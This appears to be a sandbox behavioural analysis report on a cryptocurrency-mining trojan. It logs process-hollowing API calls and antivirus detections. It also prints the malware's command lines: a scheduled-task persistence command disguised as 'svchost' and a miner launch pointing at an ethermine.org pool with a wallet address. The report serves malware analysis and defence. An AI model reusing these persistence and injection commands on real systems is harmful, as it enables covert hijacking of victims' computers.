WriteProcessMemory April 24, 2021, 6 p.m.	buffer: MZÿÿ¸@0º´ Í!¸LÍ!This program cannot be run in DOS mode. $CZRÚ;<;<;<C¯;<T8 ;<T?;<T9!;<T=;<\S= ;<;=o9< ýò;< ýó;<ÁT8<9<ÁT9;<ÁT5;<ÁT<;<ÁTÃ;<;«;<ÁT>;<Rich;<PEdÀ¹p`ð"L!>\ @à8ó9` æ-Xøæ-¤P8`/h`8r0ÊË(PÊ*0`! .text×J!L! `.rdataÈÇ`!ÈP!@@.dataØ,0.Ê.@À.pdatah`/â.@@.nv_fatbH618t0@À.nvFatBi@8¬7@À.rsrcP8®7@@.relocr`8t¶7@B base_address: 0x0000000140000000 process_identifier: 3020 process_handle: 0x00000000000001f0	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2524 called NtSetContextThread to modify thread in remote process 3020
NtSetContextThread April 24, 2021, 6 p.m.	registers.r14: 0 registers.r15: 0 registers.rcx: 5370839644 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 1899992 registers.r11: 0 registers.r8: 0 registers.r9: 0 registers.rip: 1998505216 registers.rdx: 8796092878848 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 0 registers.r13: 0 thread_handle: 0x00000000000001e0 process_identifier: 3020	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2524 resumed a thread in remote process 3020
NtResumeThread April 24, 2021, 6 p.m.	thread_handle: 0x00000000000001e0 suspend_count: 1 process_identifier: 3020	1	0	0

Executed a process and injected code into it, probably while unpacking (43 events)

Time & API	Arguments	Status	Return
NtResumeThread April 24, 2021, 5:50 p.m.	thread_handle: 0x00000000000000c4 suspend_count: 1 process_identifier: 2232	1	0
NtResumeThread April 24, 2021, 5:50 p.m.	thread_handle: 0x0000000000000134 suspend_count: 1 process_identifier: 2232	1	0
NtResumeThread April 24, 2021, 5:50 p.m.	thread_handle: 0x000000000000017c suspend_count: 1 process_identifier: 2232	1	0
NtResumeThread April 24, 2021, 5:50 p.m.	thread_handle: 0x00000000000001ec suspend_count: 1 process_identifier: 2232	1	0
CreateProcessInternalW April 24, 2021, 5:50 p.m.	thread_identifier: 1396 thread_handle: 0x0000000000000360 process_identifier: 584 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000368	1	1
NtResumeThread April 24, 2021, 5:51 p.m.	thread_handle: 0x0000000000000368 suspend_count: 1 process_identifier: 2232	1	0
CreateProcessInternalW April 24, 2021, 5:51 p.m.	thread_identifier: 2720 thread_handle: 0x00000000000003d0 process_identifier: 1940 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe track: 1 command_line: "C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe" filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000003ec	1	1
NtResumeThread April 24, 2021, 5:51 p.m.	thread_handle: 0x00000000000003d4 suspend_count: 1 process_identifier: 2232	1	0
CreateProcessInternalW April 24, 2021, 5:51 p.m.	thread_identifier: 1348 thread_handle: 0x00000000000003dc process_identifier: 2524 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\svchost.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\svchost.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\svchost.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000408	1	1
CreateProcessInternalW April 24, 2021, 5:50 p.m.	thread_identifier: 2164 thread_handle: 0x0000000000000060 process_identifier: 2988 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000064	1	1
NtResumeThread April 24, 2021, 5:59 p.m.	thread_handle: 0x00000000000000c4 suspend_count: 1 process_identifier: 1940	1	0
NtResumeThread April 24, 2021, 5:59 p.m.	thread_handle: 0x0000000000000134 suspend_count: 1 process_identifier: 1940	1	0
NtResumeThread April 24, 2021, 5:59 p.m.	thread_handle: 0x0000000000000174 suspend_count: 1 process_identifier: 1940	1	0
NtResumeThread April 24, 2021, 5:59 p.m.	thread_handle: 0x00000000000000c4 suspend_count: 1 process_identifier: 2524	1	0
NtResumeThread April 24, 2021, 5:59 p.m.	thread_handle: 0x0000000000000134 suspend_count: 1 process_identifier: 2524	1	0
NtResumeThread April 24, 2021, 5:59 p.m.	thread_handle: 0x00000000000001a0 suspend_count: 1 process_identifier: 2524	1	0
NtResumeThread April 24, 2021, 5:59 p.m.	thread_handle: 0x00000000000001f0 suspend_count: 1 process_identifier: 2524	1	0
CreateProcessInternalW April 24, 2021, 5:59 p.m.	thread_identifier: 1016 thread_handle: 0x000000000000035c process_identifier: 2648 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' & exit filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000000000000364	1	1
NtResumeThread April 24, 2021, 5:59 p.m.	thread_handle: 0x0000000000000368 suspend_count: 1 process_identifier: 2524	1	0
CreateProcessInternalW April 24, 2021, 6 p.m.	thread_identifier: 2840 thread_handle: 0x00000000000003d4 process_identifier: 1744 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe track: 1 command_line: "C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe" filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\inc\sihost32.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000003f0	1	1
NtResumeThread April 24, 2021, 6 p.m.	thread_handle: 0x00000000000001ec suspend_count: 1 process_identifier: 2524	1	0
NtGetContextThread April 24, 2021, 6 p.m.	thread_handle: 0x00000000000000c8	1	0
NtResumeThread April 24, 2021, 6 p.m.	thread_handle: 0x00000000000000c8 suspend_count: 1 process_identifier: 2524	1	0
CreateProcessInternalW April 24, 2021, 6 p.m.	thread_identifier: 2472 thread_handle: 0x00000000000001e0 process_identifier: 3020 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: C:\Windows/System32\svchost.exe --response-timeout=30 --farm-retries=30 --pool stratum://`0x4a82b262BbF466b9F3f946C226CB8A672cFC2F9d`.CTEST22PC@us1.ethermine.org:4444 --unam-stealth filepath_r: stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 1 process_handle: 0x00000000000001f0	1	1
NtUnmapViewOfSection April 24, 2021, 6 p.m.	base_address: 0x0000000140000000 region_size: 8786417680384 process_identifier: 3020 process_handle: 0x00000000000001f0		-1073741799
NtAllocateVirtualMemory April 24, 2021, 6 p.m.	process_identifier: 3020 region_size: 3727360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140000000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000001f0	1	0
WriteProcessMemory April 24, 2021, 6 p.m.	buffer: MZÿÿ¸@0º´ Í!¸LÍ!This program cannot be run in DOS mode. $CZRÚ;<;<;<C¯;<T8 ;<T?;<T9!;<T=;<\S= ;<;=o9< ýò;< ýó;<ÁT8<9<ÁT9;<ÁT5;<ÁT<;<ÁTÃ;<;«;<ÁT>;<Rich;<PEdÀ¹p`ð"L!>\ @à8ó9` æ-Xøæ-¤P8`/h`8r0ÊË(PÊ*0`! .text×J!L! `.rdataÈÇ`!ÈP!@@.dataØ,0.Ê.@À.pdatah`/â.@@.nv_fatbH618t0@À.nvFatBi@8¬7@À.rsrcP8®7@@.relocr`8t¶7@B base_address: 0x0000000140000000 process_identifier: 3020 process_handle: 0x00000000000001f0	1	1
WriteProcessMemory April 24, 2021, 6 p.m.	buffer: base_address: 0x0000000140001000 process_identifier: 3020 process_handle: 0x00000000000001f0	1	1
WriteProcessMemory April 24, 2021, 6 p.m.	buffer: base_address: 0x0000000140216000 process_identifier: 3020 process_handle: 0x00000000000001f0	1	1
WriteProcessMemory April 24, 2021, 6 p.m.	buffer: base_address: 0x00000001402e3000 process_identifier: 3020 process_handle: 0x00000000000001f0	1	1
WriteProcessMemory April 24, 2021, 6 p.m.	buffer: base_address: 0x00000001402f6000 process_identifier: 3020 process_handle: 0x00000000000001f0	1	1
WriteProcessMemory April 24, 2021, 6 p.m.	buffer: base_address: 0x0000000140310000 process_identifier: 3020 process_handle: 0x00000000000001f0	1	1
WriteProcessMemory April 24, 2021, 6 p.m.	buffer: ±CbF1@ base_address: 0x0000000140384000 process_identifier: 3020 process_handle: 0x00000000000001f0	1	1
WriteProcessMemory April 24, 2021, 6 p.m.	buffer: (@Xpè ¸ È ØQ8hhU8U8} IDI_ICON1( ~YR~WP ~XQ ~YR~VO{H>a[Ha[[}TM~YR\|NEnj_Y(fa\|e`¯`Z?lh}SKw3'_X\Ue`didfa½d_¢^X`Zz?3~ZS~VOc^Qhcyf`qd_faÄc^~ZS \V~XPw3'a[9e`pb\_aZo`Za[d_¬a\XzA6~ZS~YR\U~YQ_YZ`Zgd^f`¶d^Úb\µ`Z`Z{~[T(`Z}VN~WP·ÿÿ[T=c]f`gaµga¸d^Þd^çd^Ûa[¨\UKj}UM}UNlg`Y5gagb¦ga±ga¹d^Þd^äd_Þd_Í`ZKlh}UM~YR}VOd^Tid\|hcga¥e_Òe`ÏfaÇc^~YR ~\UyC;a[]Wfamidvhcfa¹faÅe_®_Y*b]z?7}UMt%a[>hcwidfa¸faÂb\]s}VN\U~ZRd_]icfa»d^~[U]W\|NFe`_X$ga{e`¬`Z8e`\|LD~WP{J@b\Nb\c}SL~XQ~[T~ZR~ZS~[Uþü?ü?øðàààààððøü?ü?þ h<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0000000140385000 process_identifier: 3020 process_handle: 0x00000000000001f0	1	1
WriteProcessMemory April 24, 2021, 6 p.m.	buffer: base_address: 0x0000000140386000 process_identifier: 3020 process_handle: 0x00000000000001f0	1	1
NtGetContextThread April 24, 2021, 6 p.m.	thread_handle: 0x00000000000001e0	1	0
WriteProcessMemory April 24, 2021, 6 p.m.	buffer: @ base_address: 0x000007fffffdd010 process_identifier: 3020 process_handle: 0x00000000000001f0	1	1
NtSetContextThread April 24, 2021, 6 p.m.	registers.r14: 0 registers.r15: 0 registers.rcx: 5370839644 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 1899992 registers.r11: 0 registers.r8: 0 registers.r9: 0 registers.rip: 1998505216 registers.rdx: 8796092878848 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 0 registers.r13: 0 thread_handle: 0x00000000000001e0 process_identifier: 3020	1	0
NtResumeThread April 24, 2021, 6 p.m.	thread_handle: 0x00000000000001e0 suspend_count: 1 process_identifier: 3020	1	0
CreateProcessInternalW April 24, 2021, 5:59 p.m.	thread_identifier: 2624 thread_handle: 0x0000000000000060 process_identifier: 1444 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\test22\AppData\Local\Temp\svchost.exe"' filepath_r: C:\Windows\system32\schtasks.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000064	1	1
NtResumeThread April 24, 2021, 6 p.m.	thread_handle: 0x00000000000000c4 suspend_count: 1 process_identifier: 1744	1	0
NtResumeThread April 24, 2021, 6 p.m.	thread_handle: 0x0000000000000134 suspend_count: 1 process_identifier: 1744	1	0
NtResumeThread April 24, 2021, 6 p.m.	thread_handle: 0x0000000000000178 suspend_count: 1 process_identifier: 1744	1	0

File has been identified by 41 AntiVirus engines on VirusTotal as malicious (41 events)

DrWeb	Trojan.MinerNET.21
CAT-QuickHeal	Trojan.Generic
McAfee	Artemis!E3B8893E65BD
Cylance	Unsafe
VIPRE	Trojan.Win32.Generic!BT
AegisLab	Trojan.MSIL.Convagent.4!c
K7AntiVirus	Trojan ( 0057a08c1 )
BitDefender	Gen:Variant.Bulz.416939
K7GW	Trojan ( 0057a08c1 )
Cyren	W64/MSIL_Troj.APV.gen!Eldorado
ESET-NOD32	a variant of MSIL/CoinMiner.BIP
TrendMicro-HouseCall	TROJ_GEN.R002C0WDJ21
Avast	Win64:CoinminerX-gen [Trj]
Cynet	Malicious (score: 100)
Kaspersky	HEUR:Trojan.MSIL.Convagent.gen
Alibaba	Trojan:MSIL/CoinMiner.26c2c069
NANO-Antivirus	Trojan.Win64.Convagent.iubqqo
ViRobot	Trojan.Win32.Z.Bulz.1649152.A
MicroWorld-eScan	Gen:Variant.Bulz.416939
Ad-Aware	Gen:Variant.Bulz.416939
Zillya	Trojan.CoinMiner.Win32.32643
FireEye	Generic.mg.e3b8893e65bdb0f4
Emsisoft	Gen:Variant.Bulz.416939 (B)
Ikarus	Trojan.MSIL.CoinMiner
MaxSecure	Trojan.Malware.7164915.susgen
Avira	TR/CoinMiner.exsof
Microsoft	Trojan:Win32/Mamson.A!ac
Gridinsoft	Trojan.Win64.CoinMiner.oa
GData	Gen:Variant.Bulz.416939
AhnLab-V3	Trojan/Win.Agent.R415360
VBA32	Trojan.MSIL.Convagent
ALYac	Gen:Variant.Bulz.416939
MAX	malware (ai score=81)
Malwarebytes	Trojan.BitCoinMiner.Generic
Panda	Trj/CI.A
APEX	Malicious
SentinelOne	Static AI - Malicious PE
Fortinet	W32/Generic!tr
AVG	Win64:CoinminerX-gen [Trj]
Paloalto	generic.ml
CrowdStrike	win/malicious_confidence_70% (W)

godeth.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All